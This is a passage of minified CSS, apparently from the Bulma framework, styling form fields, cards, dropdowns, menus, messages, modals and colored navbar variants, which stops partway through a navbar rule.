.fa{font-size:14px}.label{color:#363636;display:block;font-size:1rem;font-weight:700}.label:not(:last-child){margin-bottom:.5em}.label.is-small{font-size:.75rem}.label.is-medium{font-size:1.25rem}.label.is-large{font-size:1.5rem}.help{display:block;font-size:.75rem;margin-top:.25rem}.help.is-white{color:#fff}.help.is-black{color:#0a0a0a}.help.is-light{color:#f5f5f5}.help.is-dark{color:#363636}.help.is-primary{color:#00d1b2}.help.is-link{color:#3273dc}.help.is-info{color:#3298dc}.help.is-success{color:#48c774}.help.is-warning{color:#ffdd57}.help.is-danger{color:#f14668}.field:not(:last-child){margin-bottom:.75rem}.field.has-addons{display:flex;justify-content:flex-start}.field.has-addons .control:not(:last-child){margin-right:-1px}.field.has-addons .control:not(:first-child):not(:last-child) .button,.field.has-addons .control:not(:first-child):not(:last-child) .input,.field.has-addons .control:not(:first-child):not(:last-child) .select select{border-radius:0}.field.has-addons .control:first-child:not(:only-child) .button,.field.has-addons .control:first-child:not(:only-child) .input,.field.has-addons .control:first-child:not(:only-child) .select select{border-bottom-right-radius:0;border-top-right-radius:0}.field.has-addons .control:last-child:not(:only-child) .button,.field.has-addons .control:last-child:not(:only-child) .input,.field.has-addons .control:last-child:not(:only-child) .select select{border-bottom-left-radius:0;border-top-left-radius:0}.field.has-addons .control .button:not([disabled]).is-hovered,.field.has-addons .control .button:not([disabled]):hover,.field.has-addons .control .input:not([disabled]).is-hovered,.field.has-addons .control .input:not([disabled]):hover,.field.has-addons .control .select select:not([disabled]).is-hovered,.field.has-addons .control .select select:not([disabled]):hover{z-index:2}.field.has-addons .control .button:not([disabled]).is-active,.field.has-addons .control .button:not([disabled]).is-focused,.field.has-addons .control .button:not([disabled]):active,.field.has-addons .control .button:not([disabled]):focus,.field.has-addons .control .input:not([disabled]).is-active,.field.has-addons .control .input:not([disabled]).is-focused,.field.has-addons .control .input:not([disabled]):active,.field.has-addons .control .input:not([disabled]):focus,.field.has-addons .control .select select:not([disabled]).is-active,.field.has-addons .control .select select:not([disabled]).is-focused,.field.has-addons .control .select select:not([disabled]):active,.field.has-addons .control .select select:not([disabled]):focus{z-index:3}.field.has-addons .control .button:not([disabled]).is-active:hover,.field.has-addons .control .button:not([disabled]).is-focused:hover,.field.has-addons .control .button:not([disabled]):active:hover,.field.has-addons .control .button:not([disabled]):focus:hover,.field.has-addons .control .input:not([disabled]).is-active:hover,.field.has-addons .control .input:not([disabled]).is-focused:hover,.field.has-addons .control .input:not([disabled]):active:hover,.field.has-addons .control .input:not([disabled]):focus:hover,.field.has-addons .control .select select:not([disabled]).is-active:hover,.field.has-addons .control .select select:not([disabled]).is-focused:hover,.field.has-addons .control .select select:not([disabled]):active:hover,.field.has-addons .control .select select:not([disabled]):focus:hover{z-index:4}.field.has-addons .control.is-expanded{flex-grow:1;flex-shrink:1}.field.has-addons.has-addons-centered{justify-content:center}.field.has-addons.has-addons-right{justify-content:flex-end}.field.has-addons.has-addons-fullwidth .control{flex-grow:1;flex-shrink:0}.field.is-grouped{display:flex;justify-content:flex-start}.field.is-grouped>.control{flex-shrink:0}.field.is-grouped>.control:not(:last-child){margin-bottom:0;margin-right:.75rem}.field.is-grouped>.control.is-expanded{flex-grow:1;flex-shrink:1}.field.is-grouped.is-grouped-centered{justify-content:center}.field.is-grouped.is-grouped-right{justify-content:flex-end}.field.is-grouped.is-grouped-multiline{flex-wrap:wrap}.field.is-grouped.is-grouped-multiline>.control:last-child,.field.is-grouped.is-grouped-multiline>.control:not(:last-child){margin-bottom:.75rem}.field.is-grouped.is-grouped-multiline:last-child{margin-bottom:-.75rem}.field.is-grouped.is-grouped-multiline:not(:last-child){margin-bottom:0}@media screen and (min-width:769px),print{.field.is-horizontal{display:flex}}.field-label .label{font-size:inherit}@media screen and (max-width:768px){.field-label{margin-bottom:.5rem}}@media screen and (min-width:769px),print{.field-label{flex-basis:0;flex-grow:1;flex-shrink:0;margin-right:1.5rem;text-align:right}.field-label.is-small{font-size:.75rem;padding-top:.375em}.field-label.is-normal{padding-top:.375em}.field-label.is-medium{font-size:1.25rem;padding-top:.375em}.field-label.is-large{font-size:1.5rem;padding-top:.375em}}.field-body .field .field{margin-bottom:0}@media screen and (min-width:769px),print{.field-body{display:flex;flex-basis:0;flex-grow:5;flex-shrink:1}.field-body .field{margin-bottom:0}.field-body>.field{flex-shrink:1}.field-body>.field:not(.is-narrow){flex-grow:1}.field-body>.field:not(:last-child){margin-right:.75rem}}.control{box-sizing:border-box;clear:both;font-size:1rem;position:relative;text-align:left}.control.has-icons-left .input:focus~.icon,.control.has-icons-left .select:focus~.icon,.control.has-icons-right .input:focus~.icon,.control.has-icons-right .select:focus~.icon{color:#4a4a4a}.control.has-icons-left .input.is-small~.icon,.control.has-icons-left .select.is-small~.icon,.control.has-icons-right .input.is-small~.icon,.control.has-icons-right .select.is-small~.icon{font-size:.75rem}.control.has-icons-left .input.is-medium~.icon,.control.has-icons-left .select.is-medium~.icon,.control.has-icons-right .input.is-medium~.icon,.control.has-icons-right .select.is-medium~.icon{font-size:1.25rem}.control.has-icons-left .input.is-large~.icon,.control.has-icons-left .select.is-large~.icon,.control.has-icons-right .input.is-large~.icon,.control.has-icons-right .select.is-large~.icon{font-size:1.5rem}.control.has-icons-left .icon,.control.has-icons-right .icon{color:#dbdbdb;height:2.5em;pointer-events:none;position:absolute;top:0;width:2.5em;z-index:4}.control.has-icons-left .input,.control.has-icons-left .select select{padding-left:2.5em}.control.has-icons-left .icon.is-left{left:0}.control.has-icons-right .input,.control.has-icons-right .select select{padding-right:2.5em}.control.has-icons-right .icon.is-right{right:0}.control.is-loading::after{position:absolute!important;right:.625em;top:.625em;z-index:4}.control.is-loading.is-small:after{font-size:.75rem}.control.is-loading.is-medium:after{font-size:1.25rem}.control.is-loading.is-large:after{font-size:1.5rem}.breadcrumb{font-size:1rem;white-space:nowrap}.breadcrumb a{align-items:center;color:#3273dc;display:flex;justify-content:center;padding:0 .75em}.breadcrumb a:hover{color:#363636}.breadcrumb li{align-items:center;display:flex}.breadcrumb li:first-child a{padding-left:0}.breadcrumb li.is-active a{color:#363636;cursor:default;pointer-events:none}.breadcrumb li+li::before{color:#b5b5b5;content:"\0002f"}.breadcrumb ol,.breadcrumb ul{align-items:flex-start;display:flex;flex-wrap:wrap;justify-content:flex-start}.breadcrumb .icon:first-child{margin-right:.5em}.breadcrumb .icon:last-child{margin-left:.5em}.breadcrumb.is-centered ol,.breadcrumb.is-centered ul{justify-content:center}.breadcrumb.is-right ol,.breadcrumb.is-right ul{justify-content:flex-end}.breadcrumb.is-small{font-size:.75rem}.breadcrumb.is-medium{font-size:1.25rem}.breadcrumb.is-large{font-size:1.5rem}.breadcrumb.has-arrow-separator li+li::before{content:"\02192"}.breadcrumb.has-bullet-separator li+li::before{content:"\02022"}.breadcrumb.has-dot-separator li+li::before{content:"\000b7"}.breadcrumb.has-succeeds-separator li+li::before{content:"\0227B"}.card{background-color:#fff;box-shadow:0 .5em 1em -.125em rgba(10,10,10,.1),0 0 0 1px rgba(10,10,10,.02);color:#4a4a4a;max-width:100%;position:relative}.card-header{background-color:transparent;align-items:stretch;box-shadow:0 .125em .25em rgba(10,10,10,.1);display:flex}.card-header-title{align-items:center;color:#363636;display:flex;flex-grow:1;font-weight:700;padding:.75rem 1rem}.card-header-title.is-centered{justify-content:center}.card-header-icon{align-items:center;cursor:pointer;display:flex;justify-content:center;padding:.75rem 1rem}.card-image{display:block;position:relative}.card-content{background-color:transparent;padding:1.5rem}.card-footer{background-color:transparent;border-top:1px solid #ededed;align-items:stretch;display:flex}.card-footer-item{align-items:center;display:flex;flex-basis:0;flex-grow:1;flex-shrink:0;justify-content:center;padding:.75rem}.card-footer-item:not(:last-child){border-right:1px solid #ededed}.card .media:not(:last-child){margin-bottom:1.5rem}.dropdown{display:inline-flex;position:relative;vertical-align:top}.dropdown.is-active .dropdown-menu,.dropdown.is-hoverable:hover .dropdown-menu{display:block}.dropdown.is-right .dropdown-menu{left:auto;right:0}.dropdown.is-up .dropdown-menu{bottom:100%;padding-bottom:4px;padding-top:initial;top:auto}.dropdown-menu{display:none;left:0;min-width:12rem;padding-top:4px;position:absolute;top:100%;z-index:20}.dropdown-content{background-color:#fff;border-radius:4px;box-shadow:0 .5em 1em -.125em rgba(10,10,10,.1),0 0 0 1px rgba(10,10,10,.02);padding-bottom:.5rem;padding-top:.5rem}.dropdown-item{color:#4a4a4a;display:block;font-size:.875rem;line-height:1.5;padding:.375rem 1rem;position:relative}a.dropdown-item,button.dropdown-item{padding-right:3rem;text-align:left;white-space:nowrap;width:100%}a.dropdown-item:hover,button.dropdown-item:hover{background-color:#f5f5f5;color:#0a0a0a}a.dropdown-item.is-active,button.dropdown-item.is-active{background-color:#3273dc;color:#fff}.dropdown-divider{background-color:#ededed;border:none;display:block;height:1px;margin:.5rem 0}.level{align-items:center;justify-content:space-between}.level code{border-radius:4px}.level img{display:inline-block;vertical-align:top}.level.is-mobile{display:flex}.level.is-mobile .level-left,.level.is-mobile .level-right{display:flex}.level.is-mobile .level-left+.level-right{margin-top:0}.level.is-mobile .level-item:not(:last-child){margin-bottom:0;margin-right:.75rem}.level.is-mobile .level-item:not(.is-narrow){flex-grow:1}@media screen and (min-width:769px),print{.level{display:flex}.level>.level-item:not(.is-narrow){flex-grow:1}}.level-item{align-items:center;display:flex;flex-basis:auto;flex-grow:0;flex-shrink:0;justify-content:center}.level-item .subtitle,.level-item .title{margin-bottom:0}@media screen and (max-width:768px){.level-item:not(:last-child){margin-bottom:.75rem}}.level-left,.level-right{flex-basis:auto;flex-grow:0;flex-shrink:0}.level-left .level-item.is-flexible,.level-right .level-item.is-flexible{flex-grow:1}@media screen and (min-width:769px),print{.level-left .level-item:not(:last-child),.level-right .level-item:not(:last-child){margin-right:.75rem}}.level-left{align-items:center;justify-content:flex-start}@media screen and (max-width:768px){.level-left+.level-right{margin-top:1.5rem}}@media screen and (min-width:769px),print{.level-left{display:flex}}.level-right{align-items:center;justify-content:flex-end}@media screen and (min-width:769px),print{.level-right{display:flex}}.list{background-color:#fff;border-radius:4px;box-shadow:0 2px 3px rgba(10,10,10,.1),0 0 0 1px rgba(10,10,10,.1)}.list-item{display:block;padding:.5em 1em}.list-item:not(a){color:#4a4a4a}.list-item:first-child{border-top-left-radius:4px;border-top-right-radius:4px}.list-item:last-child{border-bottom-left-radius:4px;border-bottom-right-radius:4px}.list-item:not(:last-child){border-bottom:1px solid #dbdbdb}.list-item.is-active{background-color:#3273dc;color:#fff}a.list-item{background-color:#f5f5f5;cursor:pointer}.media{align-items:flex-start;display:flex;text-align:left}.media .content:not(:last-child){margin-bottom:.75rem}.media .media{border-top:1px solid rgba(219,219,219,.5);display:flex;padding-top:.75rem}.media .media .content:not(:last-child),.media .media .control:not(:last-child){margin-bottom:.5rem}.media .media .media{padding-top:.5rem}.media .media .media+.media{margin-top:.5rem}.media+.media{border-top:1px solid rgba(219,219,219,.5);margin-top:1rem;padding-top:1rem}.media.is-large+.media{margin-top:1.5rem;padding-top:1.5rem}.media-left,.media-right{flex-basis:auto;flex-grow:0;flex-shrink:0}.media-left{margin-right:1rem}.media-right{margin-left:1rem}.media-content{flex-basis:auto;flex-grow:1;flex-shrink:1;text-align:left}@media screen and (max-width:768px){.media-content{overflow-x:auto}}.menu{font-size:1rem}.menu.is-small{font-size:.75rem}.menu.is-medium{font-size:1.25rem}.menu.is-large{font-size:1.5rem}.menu-list{line-height:1.25}.menu-list a{border-radius:2px;color:#4a4a4a;display:block;padding:.5em .75em}.menu-list a:hover{background-color:#f5f5f5;color:#363636}.menu-list a.is-active{background-color:#3273dc;color:#fff}.menu-list li ul{border-left:1px solid #dbdbdb;margin:.75em;padding-left:.75em}.menu-label{color:#7a7a7a;font-size:.75em;letter-spacing:.1em;text-transform:uppercase}.menu-label:not(:first-child){margin-top:1em}.menu-label:not(:last-child){margin-bottom:1em}.message{background-color:#f5f5f5;border-radius:4px;font-size:1rem}.message strong{color:currentColor}.message a:not(.button):not(.tag):not(.dropdown-item){color:currentColor;text-decoration:underline}.message.is-small{font-size:.75rem}.message.is-medium{font-size:1.25rem}.message.is-large{font-size:1.5rem}.message.is-white{background-color:#fff}.message.is-white .message-header{background-color:#fff;color:#0a0a0a}.message.is-white .message-body{border-color:#fff}.message.is-black{background-color:#fafafa}.message.is-black .message-header{background-color:#0a0a0a;color:#fff}.message.is-black .message-body{border-color:#0a0a0a}.message.is-light{background-color:#fafafa}.message.is-light .message-header{background-color:#f5f5f5;color:rgba(0,0,0,.7)}.message.is-light .message-body{border-color:#f5f5f5}.message.is-dark{background-color:#fafafa}.message.is-dark .message-header{background-color:#363636;color:#fff}.message.is-dark .message-body{border-color:#363636}.message.is-primary{background-color:#ebfffc}.message.is-primary .message-header{background-color:#00d1b2;color:#fff}.message.is-primary .message-body{border-color:#00d1b2;color:#00947e}.message.is-link{background-color:#eef3fc}.message.is-link .message-header{background-color:#3273dc;color:#fff}.message.is-link .message-body{border-color:#3273dc;color:#2160c4}.message.is-info{background-color:#eef6fc}.message.is-info .message-header{background-color:#3298dc;color:#fff}.message.is-info .message-body{border-color:#3298dc;color:#1d72aa}.message.is-success{background-color:#effaf3}.message.is-success .message-header{background-color:#48c774;color:#fff}.message.is-success .message-body{border-color:#48c774;color:#257942}.message.is-warning{background-color:#fffbeb}.message.is-warning .message-header{background-color:#ffdd57;color:rgba(0,0,0,.7)}.message.is-warning .message-body{border-color:#ffdd57;color:#947600}.message.is-danger{background-color:#feecf0}.message.is-danger .message-header{background-color:#f14668;color:#fff}.message.is-danger .message-body{border-color:#f14668;color:#cc0f35}.message-header{align-items:center;background-color:#4a4a4a;border-radius:4px 4px 0 0;color:#fff;display:flex;font-weight:700;justify-content:space-between;line-height:1.25;padding:.75em 1em;position:relative}.message-header .delete{flex-grow:0;flex-shrink:0;margin-left:.75em}.message-header+.message-body{border-width:0;border-top-left-radius:0;border-top-right-radius:0}.message-body{border-color:#dbdbdb;border-radius:4px;border-style:solid;border-width:0 0 0 4px;color:#4a4a4a;padding:1.25em 1.5em}.message-body code,.message-body pre{background-color:#fff}.message-body pre code{background-color:transparent}.modal{align-items:center;display:none;flex-direction:column;justify-content:center;overflow:hidden;position:fixed;z-index:40}.modal.is-active{display:flex}.modal-background{background-color:rgba(10,10,10,.86)}.modal-card,.modal-content{margin:0 20px;max-height:calc(100vh - 160px);overflow:auto;position:relative;width:100%}@media screen and (min-width:769px),print{.modal-card,.modal-content{margin:0 auto;max-height:calc(100vh - 40px);width:640px}}.modal-close{background:0 0;height:40px;position:fixed;right:20px;top:20px;width:40px}.modal-card{display:flex;flex-direction:column;max-height:calc(100vh - 40px);overflow:hidden;-ms-overflow-y:visible}.modal-card-foot,.modal-card-head{align-items:center;background-color:#f5f5f5;display:flex;flex-shrink:0;justify-content:flex-start;padding:20px;position:relative}.modal-card-head{border-bottom:1px solid #dbdbdb;border-top-left-radius:6px;border-top-right-radius:6px}.modal-card-title{color:#363636;flex-grow:1;flex-shrink:0;font-size:1.5rem;line-height:1}.modal-card-foot{border-bottom-left-radius:6px;border-bottom-right-radius:6px;border-top:1px solid #dbdbdb}.modal-card-foot .button:not(:last-child){margin-right:.5em}.modal-card-body{-webkit-overflow-scrolling:touch;background-color:#fff;flex-grow:1;flex-shrink:1;overflow:auto;padding:20px}.navbar{background-color:#fff;min-height:3.25rem;position:relative;z-index:30}.navbar.is-white{background-color:#fff;color:#0a0a0a}.navbar.is-white .navbar-brand .navbar-link,.navbar.is-white .navbar-brand>.navbar-item{color:#0a0a0a}.navbar.is-white .navbar-brand .navbar-link.is-active,.navbar.is-white .navbar-brand .navbar-link:focus,.navbar.is-white .navbar-brand .navbar-link:hover,.navbar.is-white .navbar-brand>a.navbar-item.is-active,.navbar.is-white .navbar-brand>a.navbar-item:focus,.navbar.is-white .navbar-brand>a.navbar-item:hover{background-color:#f2f2f2;color:#0a0a0a}.navbar.is-white .navbar-brand .navbar-link::after{border-color:#0a0a0a}.navbar.is-white .navbar-burger{color:#0a0a0a}@media screen and (min-width:1024px){.navbar.is-white .navbar-end .navbar-link,.navbar.is-white .navbar-end>.navbar-item,.navbar.is-white .navbar-start .navbar-link,.navbar.is-white .navbar-start>.navbar-item{color:#0a0a0a}.navbar.is-white .navbar-end .navbar-link.is-active,.navbar.is-white .navbar-end .navbar-link:focus,.navbar.is-white .navbar-end .navbar-link:hover,.navbar.is-white .navbar-end>a.navbar-item.is-active,.navbar.is-white .navbar-end>a.navbar-item:focus,.navbar.is-white .navbar-end>a.navbar-item:hover,.navbar.is-white .navbar-start .navbar-link.is-active,.navbar.is-white .navbar-start .navbar-link:focus,.navbar.is-white .navbar-start .navbar-link:hover,.navbar.is-white .navbar-start>a.navbar-item.is-active,.navbar.is-white .navbar-start>a.navbar-item:focus,.navbar.is-white .navbar-start>a.navbar-item:hover{background-color:#f2f2f2;color:#0a0a0a}.navbar.is-white .navbar-end .navbar-link::after,.navbar.is-white .navbar-start .navbar-link::after{border-color:#0a0a0a}.navbar.is-white .navbar-item.has-dropdown.is-active .navbar-link,.navbar.is-white .navbar-item.has-dropdown:focus .navbar-link,.navbar.is-white .navbar-item.has-dropdown:hover .navbar-link{background-color:#f2f2f2;color:#0a0a0a}.navbar.is-white .navbar-dropdown a.navbar-item.is-active{background-color:#fff;color:#0a0a0a}}.navbar.is-black{background-color:#0a0a0a;color:#fff}.navbar.is-black .navbar-brand .navbar-link,.navbar.is-black .navbar-brand>.navbar-item{color:#fff}.navbar.is-black .navbar-brand .navbar-link.is-active,.navbar.is-black .navbar-brand .navbar-link:focus,.navbar.is-black .navbar-brand .navbar-link:hover,.navbar.is-black .navbar-brand>a.navbar-item.is-active,.navbar.is-black .navbar-brand>a.navbar-item:focus,.navbar.is-black .navbar-brand>a.navbar-item:hover{background-color:#000;color:#fff}.navbar.is-black .navbar-brand .navbar-link::after{border-color:#fff}.navbar.is-black .navbar-burger{color:#fff}@media screen and (min-width:1024px){.navbar.is-black .navbar-end .navbar-link,.navbar.is-black .navbar-end>.navbar-item,.navbar.is-black .navbar-start .navbar-link,.navbar.is-black .navbar-start>.navbar-item{color:#fff}.navbar.is-black .navbar-end .navbar-link.is-active,.navbar.is-black .navbar-end .navbar-link:focus,.navbar.is-black .navbar-end .navbar-link:hover,.navbar.is-black .navbar-end>a.navbar-item.is-active,.navbar.is-black .navbar-end>a.navbar-item:focus,.navbar.is-black .navbar-end>a.navbar-item:hover,.navbar.is-black .navbar-start .navbar-link.is-active,.navbar.is-black .navbar-start .navbar-link:focus,.navbar.is-black .navbar-start .navbar-link:hover,.navbar.is-black .navbar-start>a.navbar-item.is-active,.navbar.is-black .navbar-start>a.navbar-item:focus,.navbar.is-black .navbar-start>a.navbar-item:hover{background-color:#000;color:#fff}.navbar.is-black .navbar-end .navbar-link::after,.navbar.is-black .navbar-start .navbar-link::after{border-color:#fff}.navbar.is-black .navbar-item.has-dropdown.is-active .navbar-link,.navbar.is-black .navbar-item.has-dropdown:focus .navbar-link,.navbar.is-black .navbar-item.has-dropdown:hover .navbar-link{background-color:#000;color:#fff}.navbar.is-black .navbar-dropdown a.navbar-item.is-active{background-color:#0a0a0a;color:#fff}}.navbar.is-light{background-color:#f5f5f5;color:rgba(0,0,0,.7)}.navbar.is-light .navbar-brand .navbar-link,.navbar.is-light .navbar-brand>.navbar-item{color:rgba(0,0,0,.7)}.navbar.is-light .navbar-brand .navbar-link.is-active,.navbar.is-light .navbar-brand .navbar-link:focus,.navbar.is-light .navbar-brand .navbar-link:hover,.navbar.is-light .navbar-brand>a.navbar-item.is-active,.navbar.is-light .navbar-brand>a.navbar-item:focus,.navbar.is-light .navbar-brand>a.navbar-item:hover{background-color:#e8e8e8;color:rgba(0,0,0,.7)}.navbar.is-light .navbar-brand .navbar-link::after{border-color:rgba(0,0,0,.7)}.navbar.is-light .navbar-burger{color:rgba(0,0,0,.7)}@media screen and (min-width:1024px){.navbar.is-light .navbar-end .navbar-link,.navbar.is-light .navbar-end>.navbar-item,.navbar.is-light .navbar-start .navbar-link,.navbar.is-light .navbar-start>.navbar-item{color:rgba(0,0,0,.7)}.navbar.is-light .navbar-end .navbar-link.is-active,.navbar.is-light .navbar-end .navbar-link:focus,.navbar.is-light .navbar-end .navbar-link:hover,.navbar.is-light .navbar-end>a.navbar-item.is-active,.navbar.is-light .navbar-end>a.navbar-item:focus,.navbar.is-light .navbar-end>a.navbar-item:hover,.navbar.is-light .navbar-start .navbar-link.is-active,.navbar.is-light .navbar-start .navbar-link:focus,.navbar.is-light .navbar-start .navbar-link:hover,.navbar.is-light .navbar-start>a.navbar-item.is-active,.navbar.is-light .navbar-start>a.navbar-item:focus,.navbar.is-light .navbar-start>a.navbar-item:hover{background-color:#e8e8e8;color:rgba(0,0,0,.7)}.navbar.is-light .navbar-end .navbar-link::after,.navbar.is-light .navbar-start .navbar-link::after{border-color:rgba(0,0,0,.7)}.navbar.is-light .navbar-item.has-dropdown.is-active .navbar-link,.navbar.is-light .navbar-item.has-dropdown:focus .navbar-link,.navbar.is-light .navbar-item.has-dropdown:hover .navbar-link{background-color:#e8e8e8;color:rgba(0,0,0,.7)}.navbar.is-light .navbar-dropdown a.navbar-item.is-active{background-color:#f5f5f5;color:rgba(0,0,0,.7)}}.navbar.is-dark{background-color:#363636;color:#fff}.navbar.is-dark .navbar-brand .navbar-link,.navbar.is-dark .navbar-brand>.navbar-item{color:#fff}.navbar.is-dark .navbar-brand .navbar-link.is-active,.navbar.is-dark .navbar-brand .navbar-link:focus,.navbar.is-dark .navbar-brand .navbar-link:hover,.navbar.is-dark .navbar-brand>a.navbar-item.is-active,.navbar.is-dark .navbar-brand>a.navbar-item:focus,.navbar.is-dark .navbar-brand>a.navbar-item:hover{background-color:#292929;color:#fff}.navbar.is-dark .navbar-brand .navbar-link::after{border-color:#fff}.navbar.is-dark .navbar-burger{color:#fff}@media screen and (min-width:1024px){.navbar.is-dark .navbar-end .navbar-link,.navbar.is-dark .navbar-end>.navbar-item,.navbar.is-dark .navbar-start .navbar-link,.navbar.is-dark .navbar-start>.navbar-item{color:#fff}.navbar.is-dark .navbar-end .navbar-link.is-active,.navbar.is-dark .navbar-end .navbar-link:focus,.navbar.is-dark .navbar-end .navbar-link:hover,.navbar.is-dark .navbar-end>a.navbar-item.is-active,.navbar.is-dark .navbar-end>a.navbar-item:focus,.navbar.is-dark .navbar-end>a.navbar-item:hover,.navbar.is-dark .navbar-start .navbar-link.is-active,.navbar.is-dark .navbar-start .navbar-link:focus,.navbar.is-dark .navbar-start .navbar-link:hover,.navbar.is-dark .navbar-start>a.navbar-item.is-active,.navbar.is-dark .navbar-start>a.navbar-item:focus,.navbar.is-dark .navbar-start>a.navbar-item:hover{background-color:#292929;color:#fff}.navbar.is-dark .navbar-end .navbar-link::after,.navbar.is-dark .navbar-start .navbar-link::after{border-color:#fff}.navbar.is-dark .navbar-item.has-dropdown.is-active .navbar-link,.navbar.is-dark .navbar-item.has-dropdown:focus .navbar-link,.navbar.is-dark .navbar-item.has-dropdown:hover .navbar-link{background-color:#292929;color:#fff}.navbar.is-dark .navbar-dropdown a.navbar-item.is-active{background-color:#363636;color:#fff}}.navbar.is-primary{background-color:#00d1b2;color:#fff}.navbar.is-primary .navbar-brand .navbar-link,.navbar.is-primary .navbar-brand>.navbar-item{color:#fff}.navbar.is-primary .navbar-brand .navbar-link.is-active,.navbar.is-primary .navbar-brand .navbar-link:focus,.navbar.is-primary .navbar-brand .navbar-link:hover,.navbar.is-primary .navbar-brand>a.navbar-item.is-active,.navbar.is-primary .navbar-brand>a.navbar-item:focus,.navbar.is-primary .navbar-brand>a.navbar-item:hover{background-color:#00b89c;color:#fff}.navbar.is-primary .navbar-brand .navbar-link::after{border-color:#fff}.navbar.is-primary .navbar-burger{color:#fff}@media screen and (min-width:1024px){.navbar.is-primary .navbar-end .navbar-link,.navbar.is-primary .navbar-end>.navbar-item,.navbar.is-primary .navbar-start .navbar-link,.navbar.is-primary .navbar-start>.navbar-item{color:#fff}.navbar.is-primary .navbar-end .navbar-link.is-active,.navbar.is-primary .navbar-end .navbar-link:focus,.navbar.is-primary .navbar-end .navbar-link:hover,.navbar.is-primary .navbar-end>a.navbar-item.is-active,.navbar.is-primary .navbar-end>a.navbar-item:focus,.navbar.is-primary .navbar-end>a.navbar-item:hover,.navbar.is-primary .navbar-start .navbar-link.is-active,.navbar.is-primary .navbar-start .navbar-link:focus,.navbar.is-primary .navbar-start .navbar-link:hover,.navbar.is-primary .navbar-start>a.navbar-item.is-active,.navbar.is-primary .navbar-start>a.navbar-item:focus,.navbar.is-primary .navbar-start>a.navbar-item:hover{background-color:#00b89c;color:#fff}.navbar.is-primary .navbar-end .navbar-link::after,.navbar.is-primary .navbar-start .navbar-link::after{border-color:#fff}.navbar.is-primary .navbar-item.has-dropdown.is-active .navbar-link,.navbar.is-primary .navbar-item.has-dropdown:focus .navbar-link,.navbar.is-primary .navbar-item.has-dropdown:hover .navbar-link{background-color:#00b89c;color:#fff}.navbar.is-primary .navbar-dropdown a.navbar-item.is-active{background-color:#00d1b2;color:#fff}}.navbar.is-link{background-color:#3273dc;color:#fff}.navbar.is-link .navbar-brand .navbar-link,.navbar.is-link .navbar-brand>.navbar-item{color:#fff}.navbar.is-link .navbar-brand .navbar-link.is-active,.navbar.is-link .navbar-brand .navbar-link:focus,.navbar.is-link .navbar-brand .navbar-link:hover,.navbar.is-link .navbar-brand>a.navbar-item.is-active,.navbar.is-link .navbar-brand>a.navbar-item:focus,.navbar.is-link .navbar-brand>a.navbar-item:hover{background-color:#2366d1;color:#fff}.navbar.is-link .navbar-brand .navbar-link::after{border-color:#fff}.navbar.is-link .navbar-burger{color:#fff}@media screen and (min-width:1024px){.navbar.is-link .navbar-end .navbar-link,.navbar.is-link .navbar-end>.navbar-item,.navbar.is-link .navbar-start .navbar-link,.navbar.is-link .navbar-start>.navbar-item{color:#fff}.navbar.is-link .navbar-end .navbar-link.is-active,.navbar.is-link .navbar-end .navbar-link:focus,.navbar.is-link .navbar-end .navbar-link:hover,.navbar.is-link .navbar-end>a.navbar-item.is-active,.navbar.is-link .navbar-end>a.navbar-item:focus,.navbar.is-link .navbar-end>a.navbar-item:hover,.navbar.is-link .navbar-start .navbar-link.is-active,.navbar.is-link .navbar-start .navbar-link:focus,.navbar.is-link .navbar-start .navbar-link:hover,.navbar.is-link .navbar-start>a.navbar-item.is-active,.navbar.is-link .navbar-start>a.navbar-item:focus,.navbar.is-link .navbar-start>a.navbar-item:hover{background-color:#2366d1;color:#fff}.navbar.is-link .navbar-end .navbar-link::after,.navbar.is-link .navbar-start .navbar-link::after{border-color:#fff}.navbar.is-link .navbar-item.has-dropdown.is-active .navbar-link,.navbar.is-link .navbar-item.has-dropdown:focus .navbar-link,.navbar.is-link .navbar-item.has-dropdown:hover .navbar-link{background-color:#2366d1;color:#fff}.navbar.is-link .navbar-dropdown a.navbar-item.is-active{background-color:#3273dc;color:#fff}}.navbar.is-info{background-color:#3298dc;color:#fff}.navbar.is-info .navbar-brand .navbar-link,.navbar.is-info .navbar-brand>.navbar-item{color:#fff}.navbar.is-info .navbar-brand .navbar-link.is-active,.navbar.is-info .navbar-brand .navbar-link:focus,.navbar.is-info .navbar-brand .navbar-link:hover,.navbar.is-info .navbar-brand>a.navbar-item.is-active,.navbar.is-info .navbar-brand>a.navbar-item:focus,.navbar.is-info .navbar-brand>a.navbar-item:hover{background-color:#238cd1;color:#fff}.navbar.is-info .navbar-brand .navbar-link::after{border-color:#fff}.navbar.is-info .navbar-burger{color:#fff}@media screen and (min-width:1024px){.navbar.is-info .navbar-end .navbar-link,.navbar.is-info .navbar-end>.navbar-item,.navbar.is-info .navbar-start .navbar-link,.navbar.is-info .navbar-start>.navbar-item{color:#fff}.navbar.is-info .navbar-end .navbar-link.is-active,.navbar.is-info .navbar-end .navbar-link:focus,.navbar.is-info .navbar-end .navbar-link:hover,.navbar.is-info .navbar-end>a.navbar-item.is-active,.navbar.is-info .navbar-end>a.navbar-item:focus,.navbar.is-info .navbar-end>a.navbar-item:hover,.navbar.is-info .navbar-start .navbar-link.is-active,.navbar.is-info .navbar-start .navbar-link:focus,.navbar.is-info .navbar-start .navbar-link:hover,.navbar.is-info .navbar-start>a.navbar-item.is-active,.navbar.is-info .navbar-start>a.navbar-item:focus,.navbar.is-info .navbar-start>a.navbar-item:hover{background-color:#238cd1;color:#fff}.navbar.is-info .navbar-end .navbar-link::after,.navbar.is-info .navbar-start .navbar-link::after{border-color:#fff}.navbar.is-info .navbar-item.has-dropdown.is-active .navbar-link,.navbar.is-info .navbar-item.has-dropdown:focus .navbar-link,.navbar.is-info .navbar-item.has-dropdown:hover .navbar-link{background-color:#238cd1;color:#fff}.navbar.is-info .navbar-dropdown a.navbar-item.is-active{background-color:#3298dc;color:#fff}}.navbar.is-success{background-color:#48c774;color:#fff}.navbar.is-success .navbar-brand .navbar-link,.navbar.is-success .navbar-brand>.navbar-item{color:#fff}.navbar.is-success .navbar-brand .navbar-link.is-active,.navbar.is-success .navbar-brand .navbar-link:focus,.navbar.is-success .navbar-brand .navbar-link:hover,.navbar.is-success .navbar-brand>a.navbar-item.is-active,.navbar.is-success .navbar-brand>a.navbar-item:focus,.navbar.is-success .navbar-brand>a.navbar-item:hover{background-color:#3abb67;color:#fff}.navbar.is-success .navbar-brand .navbar-link::after{border-color:#fff}.navbar.is-success .navbar-burger{color:#fff}@media screen and (min-width:1024px){.navbar.is-success .navbar-end .navbar-link,.navbar.is-success .navbar-end>.navbar-item,.navbar.is-success .navbar-start .navbar-link,.navbar.is-success .navbar-start>.navbar-item{color:#fff}.navbar.is-success .navbar-end .navbar-link.is-active,.navbar.is-success 